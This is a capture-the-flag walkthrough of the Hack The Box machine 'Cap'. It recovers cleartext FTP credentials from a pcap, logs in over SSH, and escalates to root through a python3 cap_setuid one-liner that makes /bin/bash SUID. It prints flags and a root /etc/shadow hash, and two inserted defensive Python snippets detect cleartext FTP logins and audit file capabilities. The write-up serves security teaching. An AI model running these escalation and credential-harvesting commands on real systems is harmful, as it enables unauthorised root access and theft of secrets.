Hack-The-Box-walkthrough[Cap]

Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 05 Jun 2021
IP: 10.10.10.245

Information gathering

First, run nmap as usual.

┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.245
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn

Three ports are open: 21 (ftp), 22 (ssh) and 80 (http).

Let's start with FTP and check whether anonymous login is allowed.

┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.

Login failed. Now let's move on to port 80.

Port-80

It's a simple admin panel.

After some manual enumeration I found nothing, so let's enumerate directories with gobuster.

┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# gobuster dir -u http://10.10.10.245/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.245/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/05 21:28:05 Starting gobuster in directory enumeration mode
===============================================================
/data (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip (Status: 200) [Size: 17464]
/capture (Status: 302) [Size: 220] [--> http://10.10.10.245/data/7]

===============================================================
2021/06/05 21:29:08 Finished
===============================================================

The /data directory looks interesting, so let's check it.

It says "not found", which means the directory exists but we still need to find the right file under it.

Let's enumerate further inside the /data directory with wfuzz.

┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# wfuzz -u http://10.10.10.245/data/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 --hc 302,404
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.245/data/FUZZ
Total requests: 220560

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000051: 200 370 L 993 W 17149 Ch "2"
000000048: 200 370 L 993 W 17152 Ch "01"
000000060: 200 370 L 993 W 17143 Ch "03"
000000045: 200 370 L 993 W 17152 Ch "1"
000000070: 200 370 L 993 W 17143 Ch "3"
000000064: 200 370 L 993 W 17149 Ch "02"
000000124: 200 370 L 993 W 17146 Ch "0"
000000713: 200 370 L 993 W 17146 Ch "00"
000001803: 200 370 L 993 W 17152 Ch "001"
000002265: 200 370 L 993 W 17149 Ch "002"
000002586: 200 370 L 993 W 17146 Ch "000"
000003042: 200 370 L 993 W 17143 Ch "003"
000004236: 200 370 L 993 W 17152 Ch "0001"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 62.40377
Processed Requests: 5127
Filtered Requests: 5114
Requests/sec.: 82.15849

Many files are found inside the /data directory. After trying each of them, I found an interesting one called 00.

So let's open this URL: http://10.10.10.245/data/00

There we find a download button; let's download that file.

After downloading it, we find that it's a .pcap file; let's open it in Wireshark.

In Wireshark we see a good number of FTP requests.

I applied a filter to show only FTP traffic and found a username and password being used to log in to FTP, and the login was successful.

220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!
230 Login successful.
SYST
215 UNIX Type: L8
PORT 192,168,196,1,212,140
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
PORT 192,168,196,1,212,141
200 PORT command successful. Consider using PASV.
LIST -al
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,196,1,212,143
200 PORT command successful. Consider using PASV.
RETR notes.txt
550 Failed to open file.
QUIT
221 Goodbye.
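
The exchange above shows why plain FTP is a finding in itself: USER and PASS travel in cleartext, so anyone holding the capture holds the credentials. The following is an added example (not part of the original post) of the check a defender would run over a reconstructed control-channel stream: it pairs each PASS with the server reply, reports which logins succeeded and flags the exposure without copying the secret. The transcript is constructed from the capture above plus one made-up failed attempt for illustration.

```python
import re

# Constructed sample: the FTP control channel recovered from the capture,
# with one extra (invented) failed attempt added to show failure handling.
SAMPLE_TRANSCRIPT = """\
220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS wrongpass
530 Login incorrect.
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!
230 Login successful.
SYST
215 UNIX Type: L8
RETR notes.txt
550 Failed to open file.
QUIT
221 Goodbye.
"""

# A server reply starts with a three-digit code ("230 ..." or "230-...").
REPLY = re.compile(r"^(\d{3})[ -]")

def ftp_login_events(transcript):
    """Report every credential submission seen on the control channel.

    Each event records the username, whether the server accepted it (230)
    and the length of the cleartext password. The secret itself is not
    stored: the purpose is to alert on the exposure, not to harvest it.
    """
    events, user, pending_pass = [], None, None
    for line in transcript.splitlines():
        line = line.strip()
        if line.upper().startswith("USER "):
            user = line[5:]
        elif line.upper().startswith("PASS "):
            pending_pass = line[5:]          # password may contain spaces
        else:
            m = REPLY.match(line)
            if m and pending_pass is not None:   # reply to the PASS
                code = int(m.group(1))
                events.append({"user": user, "success": code == 230,
                               "cleartext_password_len": len(pending_pass),
                               "reply": code})
                pending_pass = None
    return events

def summarize(events):
    """Per-user counts of failed and successful cleartext logins."""
    out = {}
    for e in events:
        s = out.setdefault(e["user"], {"failed": 0, "succeeded": 0})
        s["succeeded" if e["success"] else "failed"] += 1
    return out
```

A real capture is first reassembled into this stream form (for example with Wireshark's "Follow TCP Stream" on port 21) before being fed to ftp_login_events.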

Now let's try to log in to FTP with these credentials.

┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:root): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-------- 1 1001 1001 33 Jun 02 13:50 user.txt
226 Directory send OK.

We can see nathan's home directory, which means we can log in over SSH as well.

Let’s try that.

┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# ssh nathan@10.10.10.245
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ECDSA) to the list of known hosts.
nathan@10.10.10.245's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Jun 6 09:55:09 UTC 2021

System load: 0.0
Usage of /: 35.2% of 8.73GB
Memory usage: 37%
Swap usage: 0%
Processes: 234
Users logged in: 1
IPv4 address for eth0: 10.10.10.245
IPv6 address for eth0: dead:beef::250:56ff:feb9:26d2

=> There is 1 zombie process.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Jun 6 04:45:03 2021 from 10.10.16.132
nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
nathan@cap:~$ whoami
nathan
nathan@cap:~$ cat user.txt
654905b014e892c542fb818e05e34a79

We're logged in, and we've grabbed the user.txt flag.

Privilege escalation

Let's run linPEAS.

After analyzing the linPEAS output, I found a Capabilities section that lists python3.8.

Let's check whether that binary is owned by root.

nathan@cap:~$ ls -la /usr/bin/ | grep -i python3
lrwxrwxrwx 1 root root 23 Jan 27 15:41 pdb3.8 -> ../lib/python3.8/pdb.py
lrwxrwxrwx 1 root root 31 Mar 13 2020 py3versions -> ../share/python3/py3versions.py
lrwxrwxrwx 1 root root 9 Mar 13 2020 python3 -> python3.8
lrwxrwxrwx 1 root root 16 Mar 13 2020 python3-config -> python3.8-config
-rwxr-xr-x 1 root root 5486384 Jan 27 15:41 python3.8
lrwxrwxrwx 1 root root 33 Jan 27 15:41 python3.8-config -> x86_64-linux-gnu-python3.8-config
lrwxrwxrwx 1 root root 33 Mar 13 2020 x86_64-linux-gnu-python3-config -> x86_64-linux-gnu-python3.8-config
-rwxr-xr-x 1 root root 3240 Jan 27 15:41 x86_64-linux-gnu-python3.8-config

The binary is owned by root. Let's run python3, which is a symlink to python3.8.

Inside it we call os.setuid(0), because UID 0 is always root.

Let's first check with the whoami command.

nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("whoami")'
root
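
For os.setuid(0) to succeed from an unprivileged shell, the python3.8 file must carry a file capability (cap_setuid) in its security.capability extended attribute; that attribute, not root ownership, is what makes the binary dangerous. The following is an added example (not from the original post) of a defender-side audit: it decodes the raw xattr exactly as the kernel stores it (struct vfs_cap_data) and flags binaries whose permitted set includes capabilities that lead to root. The sample bytes are constructed to match what `setcap cap_setuid+ep` writes; SAMPLE_SETUID_EP, DANGEROUS and the function names are this example's own.

```python
import os
import struct

# Capability names indexed by bit number (linux/capability.h).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]

# Capabilities that let a process become root or bypass file permissions.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_chown",
             "cap_dac_read_search", "cap_fowner", "cap_setfcap",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module"}

def decode_vfs_caps(raw):
    """Decode a security.capability xattr (struct vfs_cap_data, little-endian)."""
    magic_etc = struct.unpack_from("<I", raw, 0)[0]
    revision = magic_etc >> 24               # VFS_CAP_REVISION_1/2/3
    effective = bool(magic_etc & 1)          # VFS_CAP_FLAGS_EFFECTIVE
    words = 1 if revision == 1 else 2        # rev 1 has one 32-bit pair
    permitted = inheritable = 0
    for i in range(words):                   # rev 3 appends a rootid we ignore
        p, inh = struct.unpack_from("<II", raw, 4 + 8 * i)
        permitted |= p << (32 * i)
        inheritable |= inh << (32 * i)
    names = lambda mask: [n for i, n in enumerate(CAP_NAMES) if mask >> i & 1]
    return {"effective": effective, "permitted": names(permitted),
            "inheritable": names(inheritable)}

def audit_file_caps(paths):
    """Return (path, caps) for files whose permitted set contains a DANGEROUS cap."""
    findings = []
    for path in paths:
        try:
            raw = os.getxattr(path, "security.capability")  # Linux only
        except (OSError, AttributeError):
            continue                         # no xattr, unreadable, or not Linux
        caps = decode_vfs_caps(raw)
        if DANGEROUS & set(caps["permitted"]):
            findings.append((path, caps))
    return findings

# Constructed sample: revision 2, effective flag set, cap_setuid (bit 7) permitted.
SAMPLE_SETUID_EP = struct.pack("<IIIII", 0x02000001, 1 << 7, 0, 0, 0)
```

On a live host, `audit_file_caps(glob.glob("/usr/bin/*"))` reproduces what linPEAS reported here and should turn up nothing but the interpreters and network tools the administrator expects.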

The output is root. Now, running with root privileges, let's set the SUID bit on /bin/bash so that any user who executes it gets root.

nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("chmod +s /bin/bash")'
nathan@cap:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Jun 18 2020 /bin/bash
nathan@cap:~$ /bin/bash -p
bash-5.0# id
uid=1001(nathan) gid=1001(nathan) euid=0(root) egid=0(root) groups=0(root),1001(nathan)
bash-5.0# whoami
root
bash-5.0# cd
bash-5.0# ls
user.txt
bash-5.0# cd /root
bash-5.0# cat root.txt
3d1f4a130d6acf43f869c2c96cf065fa

bash-5.0# cat /etc/shadow | grep root
root:$6$8vQCitG5q4/cAsI0$Ey/2luHcqUjzLfwBWtArUls9.IlVMjqudyWNOUFUGDgbs9T0RqxH6PYGu/ya6yG0MNfeklSnBLlOskd98Mqdm0:18762:0:99999:7:::

Summary of knowledge

  • Use wfuzz to fuzz a directory
  • Use Wireshark to recover the FTP username and password from a .pcap file
  • python3 -c 'import os; os.setuid(0); os.system("chmod +s /bin/bash")' to privesc via the cap_setuid capability on python3

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…